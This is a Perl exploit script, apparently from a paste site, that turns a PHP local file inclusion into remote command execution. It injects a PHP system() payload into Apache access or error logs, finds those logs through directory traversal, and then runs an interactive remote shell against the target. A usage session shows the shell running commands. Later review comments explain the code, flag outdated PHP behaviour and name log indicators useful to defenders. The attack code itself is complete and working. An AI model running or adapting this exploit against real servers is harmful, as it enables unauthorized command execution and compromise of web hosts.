3xploit3r

[LFI to RCE]

Aug 14th, 2016
  1. #!/usr/bin/perl
  2.  
  3. # From Local File Inclusion to Remote Command Execution via Apache logs poisoning Exploit
  4. # Coded by Giovanni Buzzin, "Osirys"
  5. # WebSite : www.y-osirys.com
  6. # Contacts :
  7. # me[at]y-osirys[dot]com
  8. # osirys[at]autistici[dot]org
  9.  
  10. # ------------------------------------------------------------------
  11. # Exploit in action [>!]
  12. # ------------------------------------------------------------------
  13. # Usage : perl filename full_website_plus_path vuln_file_plus_var
  14. # ------------------------------------------------------------------
  15. # osirys[~]>$ perl lfi_rce.txt http://localhost/test/ index.php?page=
  16. #
  17. # ---------------------------
  18. # LFI to RCE Sploit
  19. # (Log Inj)
  20. # by Osirys
  21. # ---------------------------
  22. #
  23. # [*] Injecting evil php code ..
  24. # [*] Cheeking for Apache Logs ..
  25. # [*] Apache Log Injection completed
  26. # [*] Path: /var/log/httpd/access_log
  27. # [!] Hi my master, do your job now [x]
  28. #
  29. # shell[localhost]$> id
  30. # uid=80(apache) gid=80(apache) groups=80(apache)
  31. # shell[localhost]$> pws
  32. # bash: pws: command not found
  33. # shell[localhost]$> pwd
  34. # /home/osirys/web/test/
  35. # shell[localhost]$> exit
  36. # [-] Quitting ..
  37. #
  38. # osirys[~]>$
  39. # ------------------------------------------------------------------
  40.  
  41.  
  42. use IO::Socket::INET;
  43. use LWP::UserAgent;
  44.  
# --- Command-line input and fixed settings ---
# $host     : first argument, a full "http://..." URL (shape enforced by
#             cheek()/get_input() below).
# $lfi_path : second argument, the vulnerable script plus its parameter,
#             e.g. "index.php?page=" as in the usage example above.
my $host = $ARGV[0];
my $lfi_path = $ARGV[1];
# Appended after every candidate log path in the probe URL.  The name says
# null byte; the purpose (presumably cutting off something the target appends
# to the included path) is not stated anywhere in this file.
# NOTE(review): PHP 5.3.4 and later reject NUL bytes in filesystem paths, so
# this part of the probe is a historical artefact on current targets.
my $null_byte = "%00";
# Two markers of the form "1337<n>1337" with n in 0..149.  They bracket the
# payload in the poisoned log line and are what exec_cmd() cuts the command
# output out of.  Together with the literal "Osirys_log_inj" path used in the
# raw request below, these are the most distinctive strings this tool leaves
# in a web server's access/error logs — useful search terms when hunting for
# log-poisoning attempts.
my $rand_a = int(rand 150);
my $rand1 = "1337".$rand_a."1337";
my $rand_b = int(rand 150);
my $rand2 = "1337".$rand_b."1337";
# Set to 1 by the probe loop once a log file is found through the inclusion.
my $gotcha = 0;
# Ten ".." steps, prefixed to each log path so the inclusion resolves from the
# filesystem root regardless of the vulnerable script's own directory depth.
my $dir_trasv = "../../../../../../../../../..";
# Candidate Apache log locations, probed in this order until one is readable
# through the inclusion.  /var/log/access_log is listed twice.
# (No comments inside qw(): a '#' there would become a list element.)
my @logs_dirs = qw(
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error.log
/var/log/httpd/error_log
/var/log/access_log
/logs/error.log
/logs/access.log
/var/log/apache/error_log
/var/log/apache/error.log
/etc/httpd/logs/access_log
/usr/local/apache/logs/error_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/www/logs/access_log
/var/www/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error.log
/var/log/error_log
/apache/logs/error.log
/apache/logs/access.log
);

# The string written into the log via the request line.  If the log is later
# included by the vulnerable script, this PHP runs system() on the "cmd" query
# parameter; get_magic_quotes_gpc()/stripslashes() only undo legacy escaping.
# NOTE(review): magic_quotes_gpc was removed in PHP 5.4 and the function itself
# in PHP 8.0, where this payload would fail with a fatal error instead.
my $php_code = "<?php if(get_magic_quotes_gpc()){ \$_GET[cmd]=st".
"ripslashes(\$_GET[cmd]);} system(\$_GET[cmd]);?>";
  86.  
# --- Argument validation and banner ---
# Both arguments are required; help() prints usage and exit()s, so the "||"
# right-hand side never returns.
(($host)&&($lfi_path)) || help("-1");
# cheek() unpacks ($k, $string) but is handed a single value at both call
# sites, so inside it $k holds the URL and $string is undef (see cheek()).
cheek($host) == 1 || help("-2");
cheek($lfi_path) == 1 || help("-2");
&banner;   # "&name;" form passes the current @_ through; banner() ignores it.

# get_input() returns "<hostname> <path>" as one space-joined string and also
# assigns the package globals $h0st/$path itself; the split below repeats that
# assignment.  The greedy first capture assumes the path contains no space.
$datas = get_input($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);


# --- Step 1: write the payload into the server's log ---
# A raw TCP connection is used instead of LWP so the request line can carry
# the un-encoded payload verbatim.  Port 80 is hard-coded (no HTTPS), and the
# Host header is sent as the full URL rather than the bare hostname.
$sock = IO::Socket::INET->new(
PeerAddr => $h0st,
PeerPort => 80,
Proto => "tcp"
) || die "Can't connect to $host:80!\n";

print "[*] Injecting evil php code ..\n";

# Request line: "GET /Osirys_log_inj start0<rand1><php>0end<rand2> HTTP/1.1".
# Whatever the server records for this request (access or error log) is what
# the probe loop below searches for, keyed on the literal "Osirys_log_inj".
# From a defender's view, a request line containing "<?php" or this marker is
# an unambiguous indicator of a log-poisoning attempt.
print $sock "GET /Osirys_log_inj start0".$rand1.$php_code."0end".$rand2." HTTP/1.1\r\n";
print $sock "Host: ".$host."\r\n";
print $sock "Connection: close\r\n\r\n";
close($sock);

print "[*] Cheeking for Apache Logs ..\n";

# --- Step 2: find a log file readable through the inclusion ---
# <@logs_dirs> is glob() over the space-joined array; patterns without
# wildcards come back unchanged, so each iteration yields one candidate path.
# Probe URL shape: <host><lfi_path><traversal><log path><%00>.
while (($log = <@logs_dirs>)&&($gotcha != 1)) {
    $tmp_path = $host.$lfi_path.$dir_trasv.$log.$null_byte;
    $re = get_req($tmp_path);
    # Hit: the response echoes the marker written in step 1.
    if ($re =~ /Osirys_log_inj/) {
        $gotcha = 1;
        $log_path = $tmp_path;    # reused by exec_cmd() for every command
        print "[*] Apache Log Injection completed\n";
        print "[*] Path: $log\n";
        print "[!] Hi my master, do your job now [x]\n\n";
        # exec_cmd() either recurses or die()s, so control does not come
        # back to this loop in practice; $gotcha alone would also end it.
        &exec_cmd;
    }
}

# Reached only when every candidate path was tried without a hit.
$gotcha == 1 || die "[-] Couldn't find Apache Logs\n";
  126.  
# Interactive command loop: read one line from STDIN, send it as the "cmd"
# query parameter of the located log-inclusion URL, and print whatever the
# response contains between the two random markers.  Implemented as unbounded
# recursion (every branch ends in "&exec_cmd;" or die) rather than a loop.
# Reads package globals $h0st, $log_path, $rand1, $rand2; writes $h0st, $cmd,
# $exec_url and the miss counter $c.  Takes no arguments.
sub exec_cmd {
    # Strip the first "www." from the hostname shown in the prompt.
    $h0st !~ /www\./ || $h0st =~ s/www\.//;
    print "shell[$h0st]\$> ";
    $cmd = <STDIN>;
    # Unanchored: any input containing "exit" ends the session.
    $cmd !~ /exit/ || die "[-] Quitting ..\n\n";
    # $cmd still carries the newline from <STDIN> and is not URL-encoded.
    $exec_url = $log_path."&cmd=".$cmd;
    my $re = get_req($exec_url);
    # tag() folds spaces to '$' and other whitespace to '*' so the output can be
    # matched as a single token by the regex below; the two substitutions after
    # the match undo that mapping.
    my $content = tag($re);
    if ($content =~ m/start0$rand1(.+)\*0end$rand2/g) {
        my $out = $1;
        $out =~ s/\$/ /g;
        $out =~ s/\*/\n/g;
        chomp($out);
        print "$out\n";
        &exec_cmd;
    }
    else {
        # $c is an undeclared package global counting total misses; it is never
        # reset on success, and the third miss aborts the program.
        $c++;
        $cmd =~ s/\n//;
        print "bash: ".$cmd.": command not found\n";
        $c < 3 || die "[-] Command are not executed.\n[-] Something wrong. Exploit Failed !\n\n";
        &exec_cmd;
    }
}
  151.  
# GET $_[0] with LWP and return the response body.  Returns the body even for
# non-2xx responses (no is_success() check), so a 404/500 page is searched
# like any other.  $link is a package global, not a lexical.  HTTP::Request is
# not use'd explicitly here; LWP::UserAgent loads it.  The empty "()" prototype
# is a no-op for the call sites above, which precede this definition.
sub get_req() {
    $link = $_[0];
    my $req = HTTP::Request->new(GET => $link);
    my $ua = LWP::UserAgent->new();
    $ua->timeout(4);    # seconds; a slow target is reported as an empty body
    my $response = $ua->request($req);
    return $response->content;
}
  160.  
# Two-mode shape check on ($k, $string): $k == 1 requires an "http://" prefix,
# $k == 2 requires "<name>.<ext>?<param>=".  Returns 1 or 0 in those modes;
# for any other $k neither branch runs and the sub returns the false value of
# the last elsif test.  Both top-level call sites pass a single argument, so
# $k receives the string and $string is undef.  The "()" prototype is declared
# after those calls and therefore does not apply to them (and prototypes are
# not argument validation in any case — see Perl best-practice notes).
# "$k == 1" compares a string numerically; that warns only under "use
# warnings", which this script does not enable.
sub cheek() {
    my($k,$string) = ($_[0],$_[1]);
    if ($k == 1) {
        if ($string =~ /http:\/\/(.+)/) {
            return 1;
        }
        else {
            return 0;
        }
    }
    elsif ($k == 2) {
        if ($string =~ /(.+)\.(.+)\?(.+)=/) {
            return 1;
        }
        else {
            return 0;
        }
    }
}
  180.  
# Split "http://<hostname>/<path>" into hostname and path.  Returns them as
# one space-joined string "hostname /path" and, as a side effect, assigns the
# package globals $s_host, $h0st, $path and $full_det.
# The hostname class is [a-z.-]{1,30}: lowercase letters, dots and dashes
# only.  Digits are not in the class, so a numeric address or a name with
# digits does not match the second regex; on a failed match $1/$2 keep the
# captures of the previous successful match rather than being cleared.
sub get_input() {
    my $host = $_[0];    # shadows the file-level $host inside this sub
    $host =~ /http:\/\/(.*)/;
    $s_host = $1;
    $s_host =~ /([a-z.-]{1,30})\/(.*)/;
    ($h0st,$path) = ($1,$2);
    # Re-add the leading slash that the split regex consumed.
    $path =~ s/(.*)/\/$1/;
    $full_det = $h0st." ".$path;
    return $full_det;
}
  191.  
# Whitespace folding used by exec_cmd(): every space becomes '$', then every
# remaining whitespace character (tab, newline, CR, ...) becomes '*'.  The
# result is a single token with no whitespace, which lets a "." in the marker
# regex span what were originally line breaks.  Returns the folded copy; the
# argument itself is not modified.
sub tag() {
    my $string = $_[0];
    $string =~ s/ /\$/g;
    $string =~ s/\s/\*/g;    # no spaces are left at this point
    return($string);
}
  198.  
# Print the tool banner to STDOUT.  Called with "&banner;" from the top level
# and from help(); ignores any arguments passed through that way.
sub banner {
    print "\n".
    " --------------------------- \n".
    " LFI to RCE Sploit \n".
    " (Log Inj) \n".
    " by Osirys \n".
    " --------------------------- \n\n";
}
  207.  
# Report a start-up error and exit.  $_[0] is -1 (an argument is missing) or
# -2 (an argument failed cheek()); any other code prints only the usage line.
# Exits with status 0 in every case, so a wrapping shell script cannot tell
# this failure from a normal run by exit code.  The usage line lists one
# argument although the top level requires two (URL and script+parameter).
sub help() {
    my $error = $_[0];
    if ($error == -1) {
        &banner;
        print "\n[-] Input data failed ! \n";
    }
    elsif ($error == -2) {
        &banner;
        print "\n[-] Bad hostname address !\n";
    }
    print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
    exit(0);
}